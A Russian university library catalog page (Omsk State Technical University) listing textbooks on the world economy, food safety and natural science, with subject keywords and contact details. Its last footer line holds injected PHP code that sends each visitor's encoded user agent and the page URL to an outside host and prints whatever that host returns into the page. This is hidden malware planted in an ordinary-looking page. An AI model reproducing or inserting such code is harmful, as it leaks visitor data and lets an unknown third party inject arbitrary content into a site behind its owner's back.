ЭКОНОМИКА пищевой промышленности -- ПРЕДПРИЯТИЕ ПРОМЫШЛЕННОЕ -- ЭКОНОМИКА РЫНОЧНАЯ -- ЦИКЛ ЖИЗНЕННЫЙ ПРОДУКТА -- ПРЕДПРИЯТИЕ МАЛОЕ -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- УПРАВЛЕНИЕ ПРЕДПРИЯТИЕМ -- ПОЛИТИКА ТОВАРНАЯ предприятия -- ПЛАНИРОВАНИЕ - ПРЕДПРИЯТИЕ -- КОНКУРЕНТОСПОСОБНОСТЬ -- ПРОГРАММА ПРОИЗВОДСТВЕННАЯ -- БИЗНЕС - ПЛАН -- ПОЛИТИКА ЦЕНОВАЯ предприятия -- ЦЕНООБРАЗОВАНИЕ -- МАРКЕТИНГ - ПРЕДПРИЯТИЕ -- Политика маркетинговая -- СТИМУЛИРОВАНИЕ продаж -- АМОРТИЗАЦИЯ ОСНОВНЫХ СРЕДСТВ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ пищевой -- СЕРТИФИКАЦИЯ продукции пищевой -- УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- БЕЗОПАСНОСТЬ продукции пищевой -- РЕСУРСЫ ПРЕДПРИЯТИЯ -- ФОНД ОСНОВНОЙ -- МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ -- СРЕДСТВА ОБОРОТНЫЕ -- ФОНД ОБОРОТНЫЙ -- ПЕРСОНАЛ ПРЕДПРИЯТИЯ -- КАДРЫ ПРОИЗВОДСТВЕННЫЕ -- ЗАТРАТЫ НА ПРОИЗВОДСТВО -- СЕБЕСТОИМОСТЬ ПРОДУКЦИИ -- КАЛЬКУЛЯЦИЯ -- ЭФФЕКТИВНОСТЬ ПРОИЗВОДСТВА -- ПРИБЫЛЬ ПРЕДПРИЯТИЯ -- ФИНАНСЫ ПРЕДПРИЯТИЯ -- ПЛАНИРОВАНИЕ ФИНАНСОВОЕ -- АНАЛИЗ ФИНАНСОВЫЙ ПРЕДПРИЯТИ -- ДЕЯТЕЛЬНОСТЬ ИНВЕСТИЦИОННАЯ -- ИНВЕСТИЦИИ - ПРЕДПРИЯТИЕ -- ЛИЗИНГ -- ПРОЕКТ ИНВЕСТИЦИОННЫЙ -- СТРАТЕГИЯ Ииформационная -- СИСТЕМА ИНФОРМАЦИОННАЯ ПРЕДП -- ТАЙНА КОММЕРЧЕСКАЯ -- ИННОВАЦИЯ - ПРЕДПРИЯТИЕ -- Процесс инновационный -- ПОЛИТИКА ИННОВАЦИОННАя -- ПИТАНИЕ здоровое -- БЕЗОПАСНОСТЬ НАЦИОНАЛЬНАЯ
Держатели документа (Информация об экземплярах) 
12. 
Липец Ю.Г. География мирового хозяйства [Текст] : Уч.пособие гриф-МО / Ю.Г. Липец, В.А. Пуляркин, С.Б. Шлихтер, 1999. - 399 с.
Ключевые слова 
РАЗДЕЛЕНИЕ ТРУДА МЕЖДУНАРОДН -- СЕЛЬСКОЕ ХОЗЯЙСТВО МИРОВОЕ -- СЕЛЬСКОЕ ХОЗЯЙСТВО - европа -- ФОНД ЗЕМЕЛЬНЫЙ -- МЕЛИОРАЦИЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- ПРОБЛЕМЫ ГЛОБАЛЬНЫЕ продовольственные -- Производство промышленное -- ТОРГОВЛЯ МЕЖДУНАРОДНАЯ -- ПОРТ МОРСКОЙ -- ПЕРЕВОЗКИ МОРСКИЕ -- ТРАНСПОРТ МОРСКОЙ МИРОВОЙ -- СИСТЕМА ТРАНСПОРТНАЯ мировая -- ПРОМЫШЛЕННОСТЬ ГОРНОДОБЫВАЮЩ -- ИНФРАСТРУКТУРА транспортная -- Энергетика -- Металлургия черная -- Металлургия цветная -- Копплекс машиностроительный -- ПРОИЗВОДСТВО ХИМИЧЕСКОЕ -- ПРОМЫШЛЕННОСТЬ ХИМИЧЕСКАЯ -- ПРОМЫШЛЕННОСТЬ ЛЕГКАЯ -- ПРОМЫШЛЕННОСТЬ ШВЕЙНАЯ -- Промышленность обувная -- ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ -- ПРОМЫШЛЕННОСТЬ РЫБНАЯ -- ТРАНСПОРТ МИРОВОЙ -- ПРОБЛЕМЫ ГЛОБАЛЬНЫЕ ЭКОЛОГИЧ
13. 
Стратегический ответ России на вызовы нового века [Текст] : сборник / Ин-т экономики РАН, 2004. - 606 с.
Ключевые слова 
ГЛОБАЛИЗАЦИЯ ЭКОНОМИКИ -- РОССИЯ - ЭКОНОМИКА -- БОГАТСТВО НАЦИОНАЛЬНОЕ -- ПРОБЛЕМЫ СОЦИАЛЬНЫЕ - Россия -- ВВП - РОССИЯ -- ДЕМОГРАФИЯ - РОССИЯ -- РОССИЯ - ДЕМОГРАФИЯ -- РЕСУРСЫ ТРУДОВЫЕ - РОССИЯ -- ИРЧП -- ИНДЕКС РАЗВИТИЯ ЧЕЛОВЕЧЕСКОГ -- УРОВЕНЬ ЖИЗНИ - РОССИЯ -- ПОТЕНЦИАЛ ЧЕЛОВЕЧЕСКИЙ -- КАПИТАЛ ОСНОВНОЙ - россия -- РЕСУРСЫ ПРИРОДНЫЕ - РОССИЯ -- СТРАТЕГИЯ РАЗВИТИЯ России -- ПОЛИТИКА МАКРОЭКОНОМИЧЕСКАЯ -- ДОХОДЫ НАСЕЛЕНИЯ - РОССИЯ -- ЖКХ - РОССИЯ -- ЖКХ - реформа -- ЗДРАВООХРАНЕНИЕ - ПОЛИТИКА -- ОБРАЗОВАНИЕ - ПОЛИТИКА -- КУЛЬТУРА - ПОЛИТИКА -- ПРОМЫШЛЕННОСТЬ - РОССИЯ -- ПОЛИТИКА ПРОМЫШЛЕННАЯ -- СТРАТЕГИЯ ИНВЕСТИЦИОННАЯ -- Экономика инновационная -- СТРАТЕГИЯ ИННОВАЦИОННАЯ -- НИОКР -- КАТАСТРОФА ТЕХНОГЕННАЯ -- ФОНД ОСНОВНОЙ промышленности -- НЕДРОПОЛЬЗОВАНИе -- РЕНТА ПРИРОДНАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- ЭЛЕКТРОННАЯ россия -- УПРАВЛЕНИЕ ГОСУДАРСТВЕННОЕ -- ПРЕДПРИЯТИЕ МАЛОЕ - россия -- БИЗНЕС МАЛЫЙ - РОССИЯ -- ЭКОНОМИКА КОРПОРАТИВНАЯ -- ГРУППА ФИНАНСОВО-ПРОМЫШЛЕННА -- ФПГ - РОССИЯ -- ХОЛДИНГ - россия -- МОНОПОЛИЯ ЕСТЕСТВЕННАЯ -- УПРАВЛЕНИЕ КОРПОРАТИВНОЕ -- ПОЛИТИКА ФИНАНСОВАЯ - РОССИЯ -- ПОТЕНЦИАЛ финансовый -- СТРАТЕГИЯ БЮДЖЕТНАЯ -- РЫНОК ФОНДОВЫЙ - РОССИЯ -- СИСТЕМА КРЕДИТНО-ДЕНЕЖНАЯ -- ПОЛИТИКА ДЕНЕЖНО-КРЕДИТНАЯ -- ЦЕНООБРАЗОВАНИЕ - Россия -- ЦЕНА РЫНОЧНАЯ - россия
Держатели документа (Информация об экземплярах) 
14. 
Политика здорового питания [Текст] : Федеральный и региональный уровни, 2002. - 342 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- Питание человека -- ВЕЩЕСТВА пищевые -- ПИЩА -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ -- Микотоксины -- ПИТАНИЕ - ЗДОРОВЬЕ -- Контроль гигиенический -- ФАЛЬСИФИКАЦИЯ продуктов -- Статус пищевой -- ЗДОРОВЬЕ НАСЕЛЕНИЯ - россия -- микронутриенты -- ВИТАМИНЫ - питание -- КАЛЬЦИЙ - ПИТАНИЕ -- МАГНИЙ - ПИТАНИЕ -- ЖЕЛЕЗО - ПИТАНИЕ -- ЙОД - ПИТАНИЕ -- СЕЛЕН - ПИТАНИЕ -- МИКРОЭЛЕМЕНТЫ - ПИТАНИЕ -- ВОЛОКНО пищевое -- ДЕФИЦИТ витаминный -- ПИЩА - ЭКОЛОГИЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ПИТАНИЕ ЗДОРОВОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ШКОЛЬНИКОВ -- РАСТЕНИЯ ТРАНСГЕННЫЕ -- ГЕНЕТИКА РАСТЕНИЙ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- Питание - словарь терминов
Держатели документа (Информация об экземплярах) 
15. 
Спиридонов И. А. Мировая экономика [Текст] : учеб. пособие / И. А. Спиридонов, 2004. - 272 с.
Ключевые слова 
ЭКОНОМИКА МИРОВАЯ -- РАЗДЕЛЕНИЕ ТРУДА МЕЖДУНАРОДН -- ХОЗЯЙСТВО МИРОВОЕ -- КОНКУРЕНЦИЯ МЕЖДУНАРОДНАЯ -- СИСТЕМА НАЦИОНАЛЬНЫХ СЧЕТОВ -- ИНТЕГРАЦИЯ ЭКОНОМИЧЕСКАЯ МЕЖ -- СОТРУДНИЧЕСТВО МЕЖДУНАРОДНОЕ -- ПРОБЛЕМЫ ГЛОБАЛЬНЫЕ ЭКОНОМИЧ -- КРИЗИС ЭКОЛОГИЧЕСКИЙ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- РЕСУРСЫ ПРИРОДНЫЕ МЕЖДУНАРОД -- РЕСУРСЫ ЛЕСНЫЕ -- ОКЕАН МИРОВОЙ -- АТМОСФЕРА -- ИСКОПАЕМЫЕ -- ЧИСЛЕННОСТЬ НАСЕЛЕНИЯ МИРА -- УРБАНИЗАЦИЯ - экономика -- РЕСУРСЫ ТРУДОВЫЕ МЕЖДУНАРОДН -- ПОТЕНЦИАЛ НАУЧНО - технический -- ПРОГРЕСС НАУЧНО-ТЕХНИЧЕСКИЙ -- НТП -- ПРОМЫШЛЕННОСТЬ МИРОВАЯ -- КОМПЛЕКС ТОПЛИВНО-ЭНЕРГЕТИЧЕ -- МАШИНОСТРОЕНИЕ -- КОМПЛЕКС АГРОПРОМЫШЛЕННЫЙ -- КОМПЛЕКС ТРАНСПОРТНЫЙ
Держатели документа (Информация об экземплярах) 
16. 
Каня И. П. Безопасность продовольственного сырья и продуктов питания [Текст] : курс лекций для студентов специальности 260501 "Технология продуктов общественного питания" / И. П. Каня, 2009. - 184 с.
Держатели документа (Информация об экземплярах) 
17. 
Хлебников В. И. Технология товаров (продовольственных) [Текст] : учеб. для студентов вузов / В. И. Хлебников, 2005. - 426 с.
Держатели документа (Информация об экземплярах) 
18. 
Мировая экономика [Текст] : учеб. пособие для студентов высш. учеб. заведений / под ред. И. П. Николаевой, 2003. - 575 с.
Ключевые слова 
ЭКОНОМИКА МИРОВАЯ -- ЭКОНОМИКА МИРОВАЯ - История -- ХОЗЯЙСТВО МИРОВОЕ -- ГЛОБАЛИЗАЦИЯ ЭКОНОМИКИ МИРОВ -- РЕВОЛЮЦИЯ ПРОМЫШЛЕННАЯ -- КОНЪЮНКТУРА МИРОВОГО РЫНКА -- ЭКОНОМИКА НАЦИОНАЛЬНАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- ПРОБЛЕМА ЭКОЛОГИЧЕСКАЯ -- УЧЕТ ЭКОЛОГИЧЕСКИЙ -- ИНТЕГРАЦИЯ ЭКОЛОГИЧЕСКАЯ -- РЫНОК МИРОВОЙ -- ТОРГОВЛЯ МЕЖДУНАРОДНАЯ -- ТОРГОВЛЯ ВНЕШНЯЯ -- ПОЛИТИКА ВНЕШНЕТОРГОВАЯ -- МИГРАЦИЯ РЕСУРСОВ ТРУДОВЫХ -- РЫНОК ТРУДА МИРОВОЙ -- ПОЛИТИКА МИГРАЦИОННАЯ -- МИГРАЦИЯ КАПИТАЛА МЕЖДУНАРОД -- ИНВЕСТИЦИИ МЕЖДУНАРОДНЫЕ -- ТНК -- КОМПАНИЯ ТРАНСНАЦИОНАЛЬНАЯ -- СИСТЕМА ВАЛЮТНАЯ МИРОВАЯ -- КУРС ВАЛЮТНЫЙ -- РЫНОК ВАЛЮТНЫЙ -- ОТНОШЕНИЯ МЕЖДУНАРОДНЫЕ КРЕД -- БАЛАНС ТОРГОВЫЙ -- БАЛАНС ПЛАТЕЖНЫЙ -- Баланс расчетный -- СТРАНА РАЗВИТАЯ -- США - ЭКОНОМИКА -- ЯПОНИЯ - ЭКОНОМИКА -- ЕВРОПА - ЭКОНОМИКА -- СТРАНЫ РАЗВИВАЮЩИЕСЯ -- ЭКОНОМИКА МИРОВАЯ - СФРЮ -- ВЕНГРИЯ - ЭКОНОМИКА -- ЧЕХОСЛОВАКИЯ - экономика -- ПОЛЬША - ЭКОНОМИКА -- КИТАЙ - экономика -- ПРИВАТИЗАЦИЯ - ОПЫТ МИРОВОЙ -- РОССИЯ - экономика
Держатели документа (Информация об экземплярах) 
19. 
Карпенков, Степан Харланович. Концепции современного естествознания [Текст] : Учеб. для вузов / С. Х. Карпенков, 2000. - 334 с.
Ключевые слова 
Естествознание -- Учебник и пособие * -- МЕТАЛЛЫ -- УГЛЕРОД -- ЭНЕРГОРЕСУРС ПЕРВИЧНЫЙ -- Энергетика -- Изотоп радиоактивный -- РЕАКЦИЯ ХИМИЧЕСКАЯ -- АЛМАЗ искусственный -- ТКАНЬ синтетическая -- ВЕЩЕСТВА ВРЕДНЫЕ -- ОЗОНОВЫЙ СЛОЙ -- Микромир -- Макромир -- Мегамир -- Вещество -- ПРОЦЕСС ХИМИЧЕСКИЙ -- ЕСТЕСТВОЗНАНИЕ - СЛОВАРЬ ТЕР -- ДОЖДЬ КИСЛОТНЫЙ -- ГЕНОМ ЧЕЛОВЕКА -- ПАРНИКОВЫЙ ЭФФЕКТ -- ОТХОДЫ РАДИОАКТИВНЫЕ - ЭКОЛО -- Белок - питание -- ПРОИСХОЖДЕНИЕ ЖИЗНИ -- ЭВОЛЮЦИЯ ЖИЗНИ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- СТАРЕНИЕ организма -- БИОТЕХНОЛОГИЯ -- ИНЖЕНЕРИЯ ГЕННАЯ -- Клонирование


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.62 с.30 запросов, 1.13c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;